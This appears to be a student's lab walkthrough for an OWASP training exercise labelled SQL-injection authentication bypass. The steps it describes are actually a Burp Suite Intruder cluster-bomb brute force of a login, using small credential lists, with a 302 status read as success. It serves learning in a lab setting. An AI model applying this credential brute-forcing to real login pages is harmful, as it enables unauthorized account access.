Access the lab

  1. owasp 2013 → A1 INJECTION (SQL) → SQLi- Bypass Authentication → LOGIN
    attachments/Pasted image 20250312171321.png

  2. do intercept on in burp suite and enter username : admin ; password : anything ( i entered cat)
    attachments/Pasted image 20250312171334.png

  3. go to proxy in burp suite and send to intruder
    attachments/Pasted image 20250312171302.png

  4. go to intruder → first clear → then choose the attack type as → cluster bomb

  1. then select the password and click on ADD, then the username and click on ADD
    attachments/Pasted image 20250312171214.png

  2. then select payload test as 1 and enter 5 datas: admin , deeps, pinky, rinky ,root { admin 's password is admin }
    attachments/Pasted image 20250312171203.png

  3. then select payload test as 2 and enter 5 datas: admin , deeps ,cat, dog, test

  4. After filling all the 5 datas: then run attack (we are using brute force attack here)
    attachments/Pasted image 20250312171139.png

  5. then when the status code is 302 that means it is the original password ,else it is wrong password.
    attachments/Pasted image 20250312171111.png

  6. then click on the admin and send to repeater
    attachments/Pasted image 20250312171020.png

  7. then go to repeater and send
    attachments/Pasted image 20250312171003.png

  8. then next click on follow direction
    attachments/Pasted image 20250312170943.png

  9. then go to render and you see status update : user authenticated.
    attachments/Pasted image 20250312170919.png

  10. then click on the WordPress
    attachments/Pasted image 20250312170901.png

  11. then click on login.
    attachments/Pasted image 20250312170842.png

  12. then enter the username and the password here it shows that the username is wrong with this password.
    attachments/Pasted image 20250312170817.png